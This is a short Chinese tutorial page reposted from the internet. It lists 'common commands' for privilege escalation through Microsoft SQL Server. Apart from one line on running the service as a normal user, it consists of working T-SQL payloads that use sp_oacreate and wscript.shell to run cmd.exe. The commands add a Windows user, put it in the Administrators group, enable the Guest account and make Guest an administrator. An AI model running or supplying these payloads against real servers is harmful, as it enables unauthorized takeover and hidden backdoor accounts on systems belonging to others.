当前位置: 首页 > 图文教程 > 数据库 > MSSQL > SQL 提权 常用命令

MSSQL
SQL语言快速入门之三
Sql连接查询
Sql联合查询
精通数据库系列之入门-基础篇1
精通数据库系列之入门-基础篇2
精通数据库系列之入门-基础篇3
精通数据库系列之入门-技巧篇1
SQL语言快速入门之一
SQL语言快速入门之二
优化Oracle库表设计的若干方法
Oracle数据库取消8080端口占用
MS SQL SERVER 图像或大文本的输入输出
SQL Server 2000之日志传送功能 - 描述
SQL Server 2000之日志传送功能-设定
SQL Server 2000之日志传送功能—问题解决
使用JMail组件代替Sql Mail发送Email
SQL中通配符、转义符与[号的使用(downmoon)
如何在Oracle10g中启动和关闭OEM
如何快速杀死占用过多资源(CPU,内存)的数据库进程
在SQL Server 2000里设置和使用数据库复制

MSSQL 中的 SQL 提权 常用命令


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-13   浏览: 79 ::
收藏到网摘: n/a

SQL 提权 常用命令,大家可以考虑下将sqlserver的服务运行权限设置为普通用户,即可防止下面的提权。 1、连接数据库
driver={SQL Server};server=服务器IP;uid=用户名;pwd=密码;database=数据库名
2、添加新用户
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 新用户 密码 /add'
3、把用户加到管理组
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新用户 /add'
4、激活GUEST用户
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user guest /active:yes'
5、把Guest加到管理组
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup Administrators Guest /add'
关于防范方法,可以参考软晨学习网服务器安全设置栏目。